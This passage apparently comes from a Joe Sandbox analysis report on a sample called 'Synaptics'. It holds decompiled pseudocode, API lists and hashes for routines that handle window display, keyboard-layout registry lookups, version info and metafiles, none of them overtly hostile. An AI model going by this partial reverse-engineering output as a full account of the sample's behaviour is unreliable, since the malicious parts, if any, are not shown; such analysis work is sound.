                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Menu$CreateInsertItemPopupVersion
                                                                                                                                                                                          • String ID: ,$?
                                                                                                                                                                                          • API String ID: 133695497-2308483597
                                                                                                                                                                                          • Opcode ID: 496e766476e5cbb51b460a7aff5d95828f717add555cf79c0a8667af29b108e5
                                                                                                                                                                                          • Instruction ID: 398804152d519dd2ee62b9937964e6d4d0d5c4b5bb315d29c079f0e0da2fd4ec
                                                                                                                                                                                          • Opcode Fuzzy Hash: 496e766476e5cbb51b460a7aff5d95828f717add555cf79c0a8667af29b108e5
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4861E270A042449BEB10EF79D881A9A77FAFF09304F04457AEA44E7356E738EC55C749
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00442BD0 Relevance: 10.7, APIs: 7, Instructions: 156COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 69%
                                                                                                                                                                                          			E00442BD0(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _v8;
				void _v12;
				intOrPtr _v16;
				int _v24;
				int _v28;
				intOrPtr _v32;
				char _v36;
				intOrPtr* _t80;
				intOrPtr _t91;
				void* _t119;
				intOrPtr _t136;
				intOrPtr _t145;
				void* _t148;

				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t119 = __ecx;
				_v8 = __eax;
				_t145 =  *0x49de0c; // 0x49ebbc
				 *((char*)(_v8 + 0x210)) = 1;
				_push(_t148);
				_push(0x442da9);
				_push( *[fs:eax]);
				 *[fs:eax] = _t148 + 0xffffffe0;
				E0043AFAC(_v8, __ecx, __ecx, _t145);
				_v16 = _v16 + 4;
				E0043C1D4(_v8,  &_v28);
				if(E00458218() <  *(_v8 + 0x4c) + _v24) {
					_v24 = E00458218() -  *(_v8 + 0x4c);
				}
				if(E00458224() <  *(_v8 + 0x48) + _v28) {
					_v28 = E00458224() -  *(_v8 + 0x48);
				}
				if(E0045820C() > _v28) {
					_v28 = E0045820C();
				}
				if(E00458200() > _v16) {
					_v16 = E00458200();
				}
				SetWindowPos(E00441704(_v8), 0xffffffff, _v28, _v24,  *(_v8 + 0x48),  *(_v8 + 0x4c), 0x10);
				if(GetTickCount() -  *((intOrPtr*)(_v8 + 0x214)) > 0xfa && E00404C80(_t119) < 0x64 &&  *0x49bc1c != 0) {
					SystemParametersInfoA(0x1016, 0,  &_v12, 0);
					if(_v12 != 0) {
						SystemParametersInfoA(0x1018, 0,  &_v12, 0);
						if(_v12 == 0) {
							E00445E24( &_v36);
							if(_v32 <= _v24) {
							}
						}
						 *0x49bc1c(E00441704(_v8), 0x64,  *0x0049BD24 | 0x00040000);
					}
				}
				_t80 =  *0x49dbcc; // 0x49ebb8
				_t45 =  *_t80 + 0x30; // 0x20398
				E0043EE38(_v8,  *_t45);
				ShowWindow(E00441704(_v8), 4);
				 *((intOrPtr*)( *_v8 + 0x7c))();
				_pop(_t136);
				 *[fs:eax] = _t136;
				_push(0x442db0);
				 *((intOrPtr*)(_v8 + 0x214)) = GetTickCount();
				_t91 = _v8;
				 *((char*)(_t91 + 0x210)) = 0;
				return _t91;
			}
















                                                                                                                                                                                          0x00442bde
                                                                                                                                                                                          0x00442bdf
                                                                                                                                                                                          0x00442be0
                                                                                                                                                                                          0x00442be1
                                                                                                                                                                                          0x00442be2
                                                                                                                                                                                          0x00442be4
                                                                                                                                                                                          0x00442be7
                                                                                                                                                                                          0x00442bf0
                                                                                                                                                                                          0x00442bf9
                                                                                                                                                                                          0x00442bfa
                                                                                                                                                                                          0x00442bff
                                                                                                                                                                                          0x00442c02
                                                                                                                                                                                          0x00442c0a
                                                                                                                                                                                          0x00442c0f
                                                                                                                                                                                          0x00442c19
                                                                                                                                                                                          0x00442c30
                                                                                                                                                                                          0x00442c3f
                                                                                                                                                                                          0x00442c3f
                                                                                                                                                                                          0x00442c54
                                                                                                                                                                                          0x00442c63
                                                                                                                                                                                          0x00442c63
                                                                                                                                                                                          0x00442c70
                                                                                                                                                                                          0x00442c79
                                                                                                                                                                                          0x00442c79
                                                                                                                                                                                          0x00442c86
                                                                                                                                                                                          0x00442c8f
                                                                                                                                                                                          0x00442c8f
                                                                                                                                                                                          0x00442cb5
                                                                                                                                                                                          0x00442ccd
                                                                                                                                                                                          0x00442cf5
                                                                                                                                                                                          0x00442cfe
                                                                                                                                                                                          0x00442d0d
                                                                                                                                                                                          0x00442d16
                                                                                                                                                                                          0x00442d24
                                                                                                                                                                                          0x00442d2f
                                                                                                                                                                                          0x00442d2f
                                                                                                                                                                                          0x00442d2f
                                                                                                                                                                                          0x00442d53
                                                                                                                                                                                          0x00442d53
                                                                                                                                                                                          0x00442cfe
                                                                                                                                                                                          0x00442d59
                                                                                                                                                                                          0x00442d60
                                                                                                                                                                                          0x00442d66
                                                                                                                                                                                          0x00442d76
                                                                                                                                                                                          0x00442d80
                                                                                                                                                                                          0x00442d85
                                                                                                                                                                                          0x00442d88
                                                                                                                                                                                          0x00442d8b
                                                                                                                                                                                          0x00442d98
                                                                                                                                                                                          0x00442d9e
                                                                                                                                                                                          0x00442da1
                                                                                                                                                                                          0x00442da8

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SetWindowPos.USER32(00000000,000000FF,?,?,?,?,00000010,00000000,00442DA9), ref: 00442CB5
                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00442CBA
                                                                                                                                                                                          • SystemParametersInfoA.USER32(00001016,00000000,?,00000000), ref: 00442CF5
                                                                                                                                                                                          • SystemParametersInfoA.USER32(00001018,00000000,00000000,00000000), ref: 00442D0D
                                                                                                                                                                                          • AnimateWindow.USER32(00000000,00000064,00000001), ref: 00442D53
                                                                                                                                                                                          • ShowWindow.USER32(00000000,00000004,00000000,000000FF,?,?,?,?,00000010,00000000,00442DA9), ref: 00442D76
                                                                                                                                                                                            • Part of subcall function 00445E24: GetCursorPos.USER32(?), ref: 00445E28
                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00442D90
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Window$CountInfoParametersSystemTick$AnimateCursorShow
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3024527889-0
                                                                                                                                                                                          • Opcode ID: 54a305cc09a56bb811332e01a25417af1ec60ed1c2f6bf35ac9e9272792253b9
                                                                                                                                                                                          • Instruction ID: ec947e6fb4e605e95c0b99b07f50ee8800e03fd8639e7176e4c102910f3e7fae
                                                                                                                                                                                          • Opcode Fuzzy Hash: 54a305cc09a56bb811332e01a25417af1ec60ed1c2f6bf35ac9e9272792253b9
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1F513D74A00109DFEB10DF99C986E9EB7F5AF04304F6045AAF500EB395DB78AE40DB99
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00458464 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 125registryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 76%
                                                                                                                                                                                          			E00458464(intOrPtr __eax, void* __ebx, void* __fp0) {
				intOrPtr _v8;
				int _v12;
				void* _v16;
				char _v20;
				void* _v24;
				struct HKL__* _v280;
				char _v536;
				char _v600;
				char _v604;
				char _v608;
				char _v612;
				void* _t60;
				intOrPtr _t106;
				intOrPtr _t111;
				void* _t117;
				void* _t118;
				intOrPtr _t119;
				void* _t129;

				_t129 = __fp0;
				_t117 = _t118;
				_t119 = _t118 + 0xfffffda0;
				_v612 = 0;
				_v8 = __eax;
				_push(_t117);
				_push(0x45860f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t119;
				if( *((intOrPtr*)(_v8 + 0x34)) != 0) {
					L11:
					_pop(_t106);
					 *[fs:eax] = _t106;
					_push(0x458616);
					return E004049C0( &_v612);
				} else {
					 *((intOrPtr*)(_v8 + 0x34)) = E00403BBC(1);
					E004049C0(_v8 + 0x38);
					_t60 = GetKeyboardLayoutList(0x40,  &_v280) - 1;
					if(_t60 < 0) {
						L10:
						 *((char*)( *((intOrPtr*)(_v8 + 0x34)) + 0x1d)) = 0;
						E0041D5D8( *((intOrPtr*)(_v8 + 0x34)), 1);
						goto L11;
					} else {
						_v20 = _t60 + 1;
						_v24 =  &_v280;
						do {
							if(E00446294( *_v24) == 0) {
								goto L9;
							} else {
								_v608 =  *_v24;
								_v604 = 0;
								if(RegOpenKeyExA(0x80000002, E0040A5E4( &_v600,  &_v608, "System\\CurrentControlSet\\Control\\Keyboard Layouts\\%.8x", _t129, 0), 0, 0x20019,  &_v16) != 0) {
									goto L9;
								} else {
									_push(_t117);
									_push(0x4585cb);
									_push( *[fs:eax]);
									 *[fs:eax] = _t119;
									_v12 = 0x100;
									if(RegQueryValueExA(_v16, "layout text", 0, 0,  &_v536,  &_v12) == 0) {
										E00404C30( &_v612, 0x100,  &_v536);
										 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x34)))) + 0x3c))();
										if( *_v24 ==  *((intOrPtr*)(_v8 + 0x3c))) {
											E00404C30(_v8 + 0x38, 0x100,  &_v536);
										}
									}
									_pop(_t111);
									 *[fs:eax] = _t111;
									_push(0x4585d2);
									return RegCloseKey(_v16);
								}
							}
							goto L12;
							L9:
							_v24 = _v24 + 4;
							_t38 =  &_v20;
							 *_t38 = _v20 - 1;
						} while ( *_t38 != 0);
						goto L10;
					}
				}
				L12:
			}





















                                                                                                                                                                                          0x00458464
                                                                                                                                                                                          0x00458465
                                                                                                                                                                                          0x00458467
                                                                                                                                                                                          0x00458470
                                                                                                                                                                                          0x00458476
                                                                                                                                                                                          0x0045847b
                                                                                                                                                                                          0x0045847c
                                                                                                                                                                                          0x00458481
                                                                                                                                                                                          0x00458484
                                                                                                                                                                                          0x0045848e
                                                                                                                                                                                          0x004585f0
                                                                                                                                                                                          0x004585f8
                                                                                                                                                                                          0x004585fb
                                                                                                                                                                                          0x004585fe
                                                                                                                                                                                          0x0045860e
                                                                                                                                                                                          0x00458494
                                                                                                                                                                                          0x004584a3
                                                                                                                                                                                          0x004584ac
                                                                                                                                                                                          0x004584bf
                                                                                                                                                                                          0x004584c2
                                                                                                                                                                                          0x004585df
                                                                                                                                                                                          0x004585e5
                                                                                                                                                                                          0x004585eb
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004584c8
                                                                                                                                                                                          0x004584c9
                                                                                                                                                                                          0x004584d2
                                                                                                                                                                                          0x004584d5
                                                                                                                                                                                          0x004584e1
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004584e7
                                                                                                                                                                                          0x004584f9
                                                                                                                                                                                          0x004584ff
                                                                                                                                                                                          0x00458529
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0045852f
                                                                                                                                                                                          0x00458531
                                                                                                                                                                                          0x00458532
                                                                                                                                                                                          0x00458537
                                                                                                                                                                                          0x0045853a
                                                                                                                                                                                          0x0045853d
                                                                                                                                                                                          0x00458563
                                                                                                                                                                                          0x00458576
                                                                                                                                                                                          0x0045858e
                                                                                                                                                                                          0x0045859c
                                                                                                                                                                                          0x004585af
                                                                                                                                                                                          0x004585af
                                                                                                                                                                                          0x0045859c
                                                                                                                                                                                          0x004585b6
                                                                                                                                                                                          0x004585b9
                                                                                                                                                                                          0x004585bc
                                                                                                                                                                                          0x004585ca
                                                                                                                                                                                          0x004585ca
                                                                                                                                                                                          0x00458529
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004585d2
                                                                                                                                                                                          0x004585d2
                                                                                                                                                                                          0x004585d6
                                                                                                                                                                                          0x004585d6
                                                                                                                                                                                          0x004585d6
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004584d5
                                                                                                                                                                                          0x004584c2
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetKeyboardLayoutList.USER32(00000040,?,00000000,0045860F,?,022B1320,?,00458671,00000000,?,0043D4D3), ref: 004584BA
                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000002,00000000), ref: 00458522
                                                                                                                                                                                          • RegQueryValueExA.ADVAPI32(?,layout text,00000000,00000000,?,00000100,00000000,004585CB,?,80000002,00000000), ref: 0045855C
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,004585D2,00000000,?,00000100,00000000,004585CB,?,80000002,00000000), ref: 004585C5
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • System\CurrentControlSet\Control\Keyboard Layouts\%.8x, xrefs: 0045850C
                                                                                                                                                                                          • layout text, xrefs: 00458553
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseKeyboardLayoutListOpenQueryValue
                                                                                                                                                                                          • String ID: System\CurrentControlSet\Control\Keyboard Layouts\%.8x$layout text
                                                                                                                                                                                          • API String ID: 1703357764-2652665750
                                                                                                                                                                                          • Opcode ID: df926e6deaf19fa000fafb0216c6eac1fe6f0f171fb7691c1be8eeb1514cdfa6
                                                                                                                                                                                          • Instruction ID: 7c903f8fd9ad85d3247752ddaabe7f8220cad0ab59f1ef766b0bf81713acb4c4
                                                                                                                                                                                          • Opcode Fuzzy Hash: df926e6deaf19fa000fafb0216c6eac1fe6f0f171fb7691c1be8eeb1514cdfa6
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7D415174A0420DAFDB10DF55C981B9EB7F8EB48305F5140EAE904B7352DB78AE04CB69
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00474948 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 119COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 53%
                                                                                                                                                                                          			E00474948(char __eax, void* __ebx, void* __ecx, char __edx) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				signed short* _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				intOrPtr _t52;
				void* _t65;
				intOrPtr _t71;
				intOrPtr _t76;
				void* _t93;
				intOrPtr _t101;
				intOrPtr _t103;
				void* _t109;
				void* _t110;
				intOrPtr _t111;

				_t109 = _t110;
				_t111 = _t110 + 0xffffffc4;
				_v40 = 0;
				_t93 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				E00404E70(_v8);
				E00404E70(_v12);
				_push(_t109);
				_push(0x474ab3);
				_push( *[fs:eax]);
				 *[fs:eax] = _t111;
				E004049C0(__ecx);
				_v32 = 0xff;
				_push( &_v28);
				_t52 = E00404ED8( &_v8);
				_push(_t52);
				L004072A8();
				_v24 = _t52;
				if(_v24 == 0) {
					_pop(_t101);
					 *[fs:eax] = _t101;
					_push(E00474ABA);
					E004049C0( &_v40);
					return E004049E4( &_v12, 2);
				} else {
					_v16 = E0040275C(_v24);
					_push(_t109);
					_push(0x474a89);
					_push( *[fs:eax]);
					 *[fs:eax] = _t111;
					_push(_v16);
					_push(_v24);
					_push(_v28);
					_t65 = E00404ED8( &_v8);
					_push(_t65);
					L004072A0();
					if(_t65 != 0) {
						_push( &_v32);
						_push( &_v36);
						_push("\\VarFileInfo\\Translation");
						_t71 = _v16;
						_push(_t71);
						L004072B0();
						if(_t71 != 0) {
							_v64 =  *_v36 & 0x0000ffff;
							_v60 = 0;
							_v56 = E004079DC( *_v36) & 0x0000ffff;
							_v52 = 0;
							_v48 = _v12;
							_v44 = 0xb;
							E0040A664("\\StringFileInfo\\%0.4x%0.4x\\%s", 2,  &_v64,  &_v40);
							E00404A58( &_v12, _v40);
						}
						_push( &_v32);
						_push( &_v20);
						_push(E00404ED8( &_v12));
						_t76 = _v16;
						_push(_t76);
						L004072B0();
						if(_t76 != 0) {
							E0040A174(_v20, _t93);
						}
					}
					_pop(_t103);
					 *[fs:eax] = _t103;
					_push(E00474A90);
					return E0040277C(_v16);
				}
			}




























                                                                                                                                                                                          0x00474949
                                                                                                                                                                                          0x0047494b
                                                                                                                                                                                          0x00474951
                                                                                                                                                                                          0x00474954
                                                                                                                                                                                          0x00474956
                                                                                                                                                                                          0x00474959
                                                                                                                                                                                          0x0047495f
                                                                                                                                                                                          0x00474967
                                                                                                                                                                                          0x0047496e
                                                                                                                                                                                          0x0047496f
                                                                                                                                                                                          0x00474974
                                                                                                                                                                                          0x00474977
                                                                                                                                                                                          0x0047497c
                                                                                                                                                                                          0x00474981
                                                                                                                                                                                          0x0047498b
                                                                                                                                                                                          0x0047498f
                                                                                                                                                                                          0x00474994
                                                                                                                                                                                          0x00474995
                                                                                                                                                                                          0x0047499a
                                                                                                                                                                                          0x004749a1
                                                                                                                                                                                          0x00474a92
                                                                                                                                                                                          0x00474a95
                                                                                                                                                                                          0x00474a98
                                                                                                                                                                                          0x00474aa0
                                                                                                                                                                                          0x00474ab2
                                                                                                                                                                                          0x004749a7
                                                                                                                                                                                          0x004749af
                                                                                                                                                                                          0x004749b4
                                                                                                                                                                                          0x004749b5
                                                                                                                                                                                          0x004749ba
                                                                                                                                                                                          0x004749bd
                                                                                                                                                                                          0x004749c3
                                                                                                                                                                                          0x004749c7
                                                                                                                                                                                          0x004749cb
                                                                                                                                                                                          0x004749cf
                                                                                                                                                                                          0x004749d4
                                                                                                                                                                                          0x004749d5
                                                                                                                                                                                          0x004749dc
                                                                                                                                                                                          0x004749e5
                                                                                                                                                                                          0x004749e9
                                                                                                                                                                                          0x004749ea
                                                                                                                                                                                          0x004749ef
                                                                                                                                                                                          0x004749f2
                                                                                                                                                                                          0x004749f3
                                                                                                                                                                                          0x004749fa
                                                                                                                                                                                          0x00474a06
                                                                                                                                                                                          0x00474a09
                                                                                                                                                                                          0x00474a1a
                                                                                                                                                                                          0x00474a1d
                                                                                                                                                                                          0x00474a24
                                                                                                                                                                                          0x00474a27
                                                                                                                                                                                          0x00474a38
                                                                                                                                                                                          0x00474a43
                                                                                                                                                                                          0x00474a43
                                                                                                                                                                                          0x00474a4b
                                                                                                                                                                                          0x00474a4f
                                                                                                                                                                                          0x00474a58
                                                                                                                                                                                          0x00474a59
                                                                                                                                                                                          0x00474a5c
                                                                                                                                                                                          0x00474a5d
                                                                                                                                                                                          0x00474a64
                                                                                                                                                                                          0x00474a6b
                                                                                                                                                                                          0x00474a6b
                                                                                                                                                                                          0x00474a64
                                                                                                                                                                                          0x00474a72
                                                                                                                                                                                          0x00474a75
                                                                                                                                                                                          0x00474a78
                                                                                                                                                                                          0x00474a88
                                                                                                                                                                                          0x00474a88

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • 73AC14E0.VERSION(00000000,?,00000000,00474AB3,?,022B2354), ref: 00474995
                                                                                                                                                                                          • 73AC14C0.VERSION(00000000,?,00000000,00000001,00000000,00474A89,?,00000000,?,00000000,00474AB3,?,022B2354), ref: 004749D5
                                                                                                                                                                                          • 73AC1500.VERSION(00000001,\VarFileInfo\Translation,?,000000FF,00000000,?,00000000,00000001,00000000,00474A89,?,00000000,?,00000000,00474AB3), ref: 004749F3
                                                                                                                                                                                          • 73AC1500.VERSION(00000001,00000000,?,000000FF,00000001,\VarFileInfo\Translation,?,000000FF,00000000,?,00000000,00000001,00000000,00474A89,?,00000000), ref: 00474A5D
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • \VarFileInfo\Translation, xrefs: 004749EA
                                                                                                                                                                                          • \StringFileInfo\%0.4x%0.4x\%s, xrefs: 00474A33
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: C1500
                                                                                                                                                                                          • String ID: \StringFileInfo\%0.4x%0.4x\%s$\VarFileInfo\Translation
                                                                                                                                                                                          • API String ID: 1255762788-999260334
                                                                                                                                                                                          • Opcode ID: d9d274d5b90975b1e4479b0a80aa488c88212d9471dffcee97b3aec67d3ca969
                                                                                                                                                                                          • Instruction ID: 32f586d465f208a33ace568febe6e2dc1f3a77b47997a46495fde34554132249
                                                                                                                                                                                          • Opcode Fuzzy Hash: d9d274d5b90975b1e4479b0a80aa488c88212d9471dffcee97b3aec67d3ca969
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7941ECB1D04209AFDB01EBE5D981AEFB7F8AB48304F50447AF514F3291D738AE048B69
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004288B4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 99COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 70%
                                                                                                                                                                                          			E004288B4(void* __eax, void* __edx) {
				BYTE* _v8;
				int _v12;
				struct HDC__* _v16;
				short _v18;
				signed int _v24;
				short _v26;
				short _v28;
				char _v38;
				void* __ebx;
				void* __ebp;
				signed int _t35;
				struct HDC__* _t43;
				void* _t65;
				intOrPtr _t67;
				intOrPtr _t77;
				void* _t80;
				void* _t83;
				void* _t85;
				intOrPtr _t86;

				_t83 = _t85;
				_t86 = _t85 + 0xffffffdc;
				_t80 = __edx;
				_t65 = __eax;
				if( *((intOrPtr*)(__eax + 0x28)) == 0) {
					return __eax;
				} else {
					E004032B4( &_v38, 0x16);
					_t67 =  *((intOrPtr*)(_t65 + 0x28));
					_v38 = 0x9ac6cdd7;
					_t35 =  *((intOrPtr*)(_t67 + 0x18));
					if(_t35 != 0) {
						_v24 = _t35;
					} else {
						_v24 = 0x60;
					}
					_v28 = MulDiv( *(_t67 + 0xc), _v24 & 0x0000ffff, 0x9ec);
					_v26 = MulDiv( *(_t67 + 0x10), _v24 & 0x0000ffff, 0x9ec);
					_t43 = E00426DA8( &_v38);
					_v18 = _t43;
					_push(0);
					L00407638();
					_v16 = _t43;
					_push(_t83);
					_push(0x4289ef);
					_push( *[fs:eax]);
					 *[fs:eax] = _t86;
					_v12 = GetWinMetaFileBits( *(_t67 + 8), 0, 0, 8, _v16);
					_v8 = E0040275C(_v12);
					_push(_t83);
					_push(0x4289cf);
					_push( *[fs:eax]);
					 *[fs:eax] = _t86;
					if(GetWinMetaFileBits( *(_t67 + 8), _v12, _v8, 8, _v16) < _v12) {
						E00425FB8(_t67);
					}
					E0041D904(_t80, 0x16,  &_v38);
					E0041D904(_t80, _v12, _v8);
					_pop(_t77);
					 *[fs:eax] = _t77;
					_push(0x4289d6);
					return E0040277C(_v8);
				}
			}






















                                                                                                                                                                                          0x004288b5
                                                                                                                                                                                          0x004288b7
                                                                                                                                                                                          0x004288bc
                                                                                                                                                                                          0x004288be
                                                                                                                                                                                          0x004288c4
                                                                                                                                                                                          0x004289fb
                                                                                                                                                                                          0x004288ca
                                                                                                                                                                                          0x004288d4
                                                                                                                                                                                          0x004288d9
                                                                                                                                                                                          0x004288dc
                                                                                                                                                                                          0x004288e3
                                                                                                                                                                                          0x004288ea
                                                                                                                                                                                          0x004288f4
                                                                                                                                                                                          0x004288ec
                                                                                                                                                                                          0x004288ec
                                                                                                                                                                                          0x004288ec
                                                                                                                                                                                          0x0042890b
                                                                                                                                                                                          0x00428922
                                                                                                                                                                                          0x00428929
                                                                                                                                                                                          0x0042892e
                                                                                                                                                                                          0x00428932
                                                                                                                                                                                          0x00428934
                                                                                                                                                                                          0x00428939
                                                                                                                                                                                          0x0042893e
                                                                                                                                                                                          0x0042893f
                                                                                                                                                                                          0x00428944
                                                                                                                                                                                          0x00428947
                                                                                                                                                                                          0x0042895d
                                                                                                                                                                                          0x00428968
                                                                                                                                                                                          0x0042896d
                                                                                                                                                                                          0x0042896e
                                                                                                                                                                                          0x00428973
                                                                                                                                                                                          0x00428976
                                                                                                                                                                                          0x00428993
                                                                                                                                                                                          0x00428995
                                                                                                                                                                                          0x00428995
                                                                                                                                                                                          0x004289a4
                                                                                                                                                                                          0x004289b1
                                                                                                                                                                                          0x004289b8
                                                                                                                                                                                          0x004289bb
                                                                                                                                                                                          0x004289be
                                                                                                                                                                                          0x004289ce
                                                                                                                                                                                          0x004289ce

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • MulDiv.KERNEL32(?,?,000009EC), ref: 00428906
                                                                                                                                                                                          • MulDiv.KERNEL32(?,?,000009EC), ref: 0042891D
                                                                                                                                                                                          • 73CCAC50.USER32(00000000,?,?,000009EC,?,?,000009EC), ref: 00428934
                                                                                                                                                                                          • GetWinMetaFileBits.GDI32(?,00000000,00000000,00000008,?,00000000,004289EF,?,00000000,?,?,000009EC,?,?,000009EC), ref: 00428958
                                                                                                                                                                                          • GetWinMetaFileBits.GDI32(?,?,?,00000008,?,00000000,004289CF,?,?,00000000,00000000,00000008,?,00000000,004289EF), ref: 0042898B
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: BitsFileMeta
                                                                                                                                                                                          • String ID: `
                                                                                                                                                                                          • API String ID: 858000408-2679148245
                                                                                                                                                                                          • Opcode ID: 758f6c39527f4397bb5ac8e9337bbea5d287d3cdd1cc4b9367fbb58d6a4b21e7
                                                                                                                                                                                          • Instruction ID: f2e5e9c8815675a612d27dd2057d142453f41d2d556f4b9068e3620b80c0e0fa
                                                                                                                                                                                          • Opcode Fuzzy Hash: 758f6c39527f4397bb5ac8e9337bbea5d287d3cdd1cc4b9367fbb58d6a4b21e7
                                                                                                                                                                                          • Instruction Fuzzy Hash: F6314575B00218ABDB01EFD5D882ABEB7B8EF4D704F50445AF904FB281D678AD40D7A9
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00477940 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 95libraryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 68%
                                                                                                                                                                                          			E00477940(intOrPtr __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, void* _a8, intOrPtr _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				struct HINSTANCE__* _t45;
				struct HINSTANCE__* _t47;
				void* _t50;
				struct HINSTANCE__* _t51;
				struct HINSTANCE__* _t60;
				intOrPtr _t80;
				intOrPtr _t85;
				void* _t93;
				void* _t94;
				intOrPtr _t95;
				void* _t96;

				_t96 = __eflags;
				_t91 = __esi;
				_t90 = __edi;
				_t93 = _t94;
				_t95 = _t94 + 0xfffffff0;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v20 = 0;
				_v16 = __ecx;
				_v12 = __edx;
